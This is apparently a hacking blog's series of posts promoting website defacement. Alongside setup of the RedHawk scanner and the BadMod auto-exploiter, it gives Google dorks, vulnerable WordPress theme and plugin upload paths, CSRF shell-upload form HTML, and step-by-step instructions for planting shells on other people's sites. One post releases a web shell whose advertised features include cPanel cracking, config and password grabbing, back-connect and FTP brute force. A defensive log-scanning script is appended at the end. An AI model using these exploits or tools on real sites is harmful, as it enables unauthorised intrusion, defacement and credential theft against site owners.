Maxteroit: CMS WordPress

Redhawk Powerful Information Gathering Tools and Vulnerability Scanning

 


OK, in this post I would like to review a powerful tool for information gathering and vulnerability scanning called RedHawk. Let's try it.

#Installing

1. I will use the git clone method from GitHub;
use this command:
git clone https://github.com/Tuhinshubhra/RED_HAWK.git
2. Next, enter the directory with the cd command.

3. Look at this picture :


The file has no execute permission, so we must change its mode. Use this command:
chmod +x rhawk.php

#Running

1. Command :
php rhawk.php

2. After you run the tool for the first time, you must enter a website domain. For example, I use my own website domain, www.maxteroit.com:


3. Choose HTTP or HTTPS for that website:


4. The tool menu is then printed:


OK, I will try one scanner. I choose the Blogger View Scanner, and the result is:


That is all for this tutorial. If you find an error in the script, you can ask me in the comments or mail me at [email protected]
Thanks

Redhawk Powerful Information Gathering and Vulnerability Scanning Tools


You want to deface a website but do not have any programming language skills?
Don't worry. You can deface a website easily using Termux with the BadMod tool: Detect Website CMS, Website Scanner & Auto Exploiter.

BadMod Detect Website CMS, Website Scanner & Auto Exploiter


Features

  • Vulnerabilities Scanner
  • Dorking
  • CMS Detector
  • Auto Exploit:
    1. WordPress
    2. Joomla
    3. Drupal
    4. CMS Made Simple

Installation

$ pkg update && pkg upgrade
$ pkg install git php curl nano
$ git clone https://github.com/MrSqar-Ye/BadMod
$ cd BadMod
$ nano BadMod.php

Delete this code (see the image)


so that it becomes (see the image)


Then save: press Ctrl+X, type Y, and hit Enter.
Run the tool using this command:
$ php BadMod.php

Choose whichever number you want.
If you want to do dorking, use this command:


$ php Dorker.php

How To Hack Website Easily With BadMod Auto Exploit Tool

Evening, fans :p
Long time no see :v

This time I want to share a tutorial on defacing via the WordPress plugin WP-DreamWork Gallery.
Let's get straight to it.

Materials:
1. Dork: expand on it yourselves using those brains of yours :p
inurl:/wp-content/plugins/wp-dreamworkgallery/
2. CSRF:
Click here

Steps:
1. Dork on Google :v

2. Pick one of the sites.

3. Put your target into the CSRF form.

4. Open the CSRF form.

5. Choose the file/shell you want to upload.

6. If it succeeds, your file's name will be shown along with its access path :)

7. Then just open it :)

If it is still unclear, you can watch the video below :)


OK, that is all for my tutorial this time. If anything is still unclear, there is a comment section below :)
Regards,
Berandal. [OWL SQUAD]

Deface Wordpress Plugin WP-DreamWorkGallery

 Deface Wordpress Themes Multimedia1

 

Hello Maxteroit friends, this time I (Berandal) will share my new PoC about WordPress defacement; the method is the WordPress theme multimedia1 shell upload vulnerability.
Below is the write-up I uploaded to a site for publishing hacking PoCs:

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Deface Wordpress Themes Multimedia1

Login Page View

Hi, this time I want to share a shell I made myself :) I recoded this shell from IndoXploit Shell First Edition.
Thanks to the IndoXploit Coders Team. :)
All features in this shell are automated; you just click.
Shell View

[RELEASE] Berandal Shell First Edition V.1

Berandal Shell features:

  • K-RDP Shell
  • A feature for creating an RDP account; it can only be used on Windows servers.
  • Back Connect
  • CPanel/FTP Auto Deface
  • Uses the ftp_connect flow and relies only on the cPanel and FTP passwords being the same. It does not work everywhere; only sites whose FTP credentials match the cPanel user/pass can be defaced automatically.
  • Config Grabb
    • Popoji CMS
    • Voodoo CMS
    • Wordpress
    • Joomla
    • Drupal
    • Magento
    • Ellislab Devteam [CI]
    • Opencart
    • Prestashop
    • phpBB
    • Lokomedia
    • Sitelook
    • Bosweb
    • WHMCS
    • Cpanel


Jumping [error fixed]:
Jumping hpshere & Jumping /var/vhosts [updated]
Its advantage is that it can grab the domain names directly:
Cpanel Crack [blank user/pass fixed]:
This feature automatically grabs the passwords and also automatically retrieves the domain info; just follow the instructions.
SMTP Grabber:
Only retrieves the Joomla SMTP info found in the config.
Auto edit user / MPC:
Automatically edits all admin users from the config *not all of them, only for some CMSs
Certain tools carry an "NB" note; just follow its instructions.

And additional features:

  1. Server Info.
  2. PHP Info.
  3. Who Is Lookup.
  4. Safe Mode.
  5. Shell Finder.
  6. FTP Brute Force.
  7. Bypass etc/passw.
  8. CMS Lokomedia Exploiter.
  9. CMS Balitbang Exploiter.
  10. Port Scan.
  11. Zip Menu, [Upload and Unzip, ZIP Backup, Unzip Manual].
  12. Shell Checker.
  13. Hash ID.
  14. String Encoder.
  15. Network [Bind Port, Back Connect, Metasploit Connection].
========================================================================
========================================================================
Enjoy :)

Special Thanks:

Regards,
Berandal, [OWL SQUAD]

[RELEASE] Berandal Shell First Edition V.1



Hi fans :P
This time I want to share a tutorial on defacing via the WordPress theme Theagency. :)

Materials:
1. Dork.
inurl:/wp-content/themes/theagency
2. Exploit.
/wp-content/themes/theagency/includes/uploadify/uploadify.php

3. CSRF.
 Get it here.

Steps:

1. Dork on Google.

2. Pick one of the sites.

3. Enter the exploit path.

4. Vulnerable = blank page.

5. Put the site into the CSRF form.

6. Choose the file/shell you want to upload.

7. If the file uploads successfully, the number '1' will appear.

Accessing the file? (namafile is the name of the uploaded file)
/wp-content/themes/theagency/includes/uploadify/uploads/namafile 
example:
http://google.com/wp-content/themes/theagency/includes/uploadify/uploads/namafile

If it is still unclear, watch my video tutorial:

 

OK, that is all for my tutorial this time, I hope it is useful :)

Regards, 

Deface Wordpress Theme Theagency






Morning, hackers :p. Now I want to share a deface method for the WordPress theme RightNow,
while I'm online :). Let's go straight to preparing the materials:


MATERIALS:
1. Dork: 

  • inurl:/wp-content/themes/RightNow/ 
  • inurl:/wp-content/themes/RightNow/includes/
  • Index Of intext:themes/rightnow/
  • For the rest, use your own brain :V


2. Exploit:
/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php
example:
gugel.com/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php


3. CSRF. Get it here.


STEPS:

1. Dork on Google. Click here.

2. Pick one of the sites.

3. Enter the exploit path.

4. If it is vulnerable, the page will be blank.

5. Put it into the CSRF form.

6. If the file uploads successfully, the number '1' will appear.

7. Accessing the file?
site.com/wp-content/uploads/galleryimages/


If it is still unclear, watch my video below :D




OK, that is all for my tutorial this time :) See ya next time :*
If you want to learn together, you can join the OWL SQUAD Facebook group :) Click.
You can also follow my Twitter :v Twitter.


Regards,

Deface Wordpress Themes RightNow

Hello fans :* Berandal here :)
This time I want to share a tutorial on defacing via the WordPress theme ThisWay. This is actually an old bug, but there is no harm in sharing :v Who knows, it may still work :P


Materials:
1. Xampp (DOWNLOAD)
2. Exploiter (PHP) - [GET IT]
3. CSRF (for those too lazy to use Xampp :v) [GET IT]
4. Shell or deface script (if you don't have one yet, you can get one here.)


Steps:
1. Dork on Google.

2. Pick one of the sites.

3. Enter the exploit path.

4. Vulnerable:
{"status":"NOK", "ERR":"This file is incorect"}

5. Put it into the CSRF form.

6. If it succeeds, your file's name will be shown :)

7. Accessing the file?
site.co.li/wp-content/uploads/2017/02/namafile
example:
http://larryfarfan.com/wp-content/uploads/2017/02/settingsimage_h5aQ4ZfXcBYM6gSM.txt

Still unclear?
Watch my video below :)



OK, that is enough for this tutorial, I hope it is useful :)
Regards,
Berandal, [OWL SQUAD]

Deface Wordpress Themes ThisWay
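
A defender's view of the upload paths named in the posts above, as an added example (not code from this blog or from any tool it describes): a scanner for web-server access logs in combined format that flags POSTs to those theme upload handlers and any script file served with status 200 from the directories the posts say uploads land in. The log lines are constructed, and the finding names and function names are this example's own.

```python
import re
from urllib.parse import unquote

# Upload handlers named in the posts above (lower-cased, no trailing slash).
UPLOAD_HANDLERS = {
    "/wp-content/themes/multimedia1/server/php",
    "/wp-content/themes/theagency/includes/uploadify/uploadify.php",
    "/wp-content/themes/rightnow/includes/uploadify/upload_background_image.php",
}
# Directories the posts say uploaded files end up in.
DROP_DIRS = (
    "/wp-content/themes/multimedia1/server/php/files/",
    "/wp-content/themes/theagency/includes/uploadify/uploads/",
    "/wp-content/uploads/",
)
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                      r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def normalize(target):
    """Drop the query, percent-decode, lower-case and collapse repeated slashes."""
    return re.sub(r"/{2,}", "/", unquote(target.split("?", 1)[0]).lower())

def scan(lines):
    """Return (client_ip, finding, normalized_path) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        path, status = normalize(m["target"]), int(m["status"])
        if m["method"] == "POST" and path.rstrip("/") in UPLOAD_HANDLERS:
            findings.append((m["ip"], "upload_handler_post", path))
        elif status == 200 and SCRIPT_EXT.search(path) and path.startswith(DROP_DIRS):
            # An upload directory should serve media, never executable scripts.
            findings.append((m["ip"], "script_served_from_upload_dir", path))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [10/Feb/2017:09:00:01 +0000] "POST /wp-content/themes/multimedia1/server/php/ HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.7 - - [10/Feb/2017:09:00:09 +0000] "GET /wp-content/themes/multimedia1/server/php/files/shell.php HTTP/1.1" 200 941 "-" "-"',
    '198.51.100.23 - - [10/Feb/2017:09:02:00 +0000] "POST /wp-content/themes/RightNow/includes/uploadify/upload_background_image.php HTTP/1.1" 200 1 "-" "-"',
    '198.51.100.23 - - [10/Feb/2017:09:02:05 +0000] "GET /wp-content/uploads/galleryimages/a%2Ephp?x=1 HTTP/1.1" 200 77 "-" "-"',
    '192.0.2.50 - - [10/Feb/2017:09:03:00 +0000] "GET /wp-content/uploads/2017/02/photo.jpg HTTP/1.1" 200 20480 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any hit of the second kind on a production site is worth treating as an incident, and denying script execution in upload directories at the web-server level removes the condition it detects.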
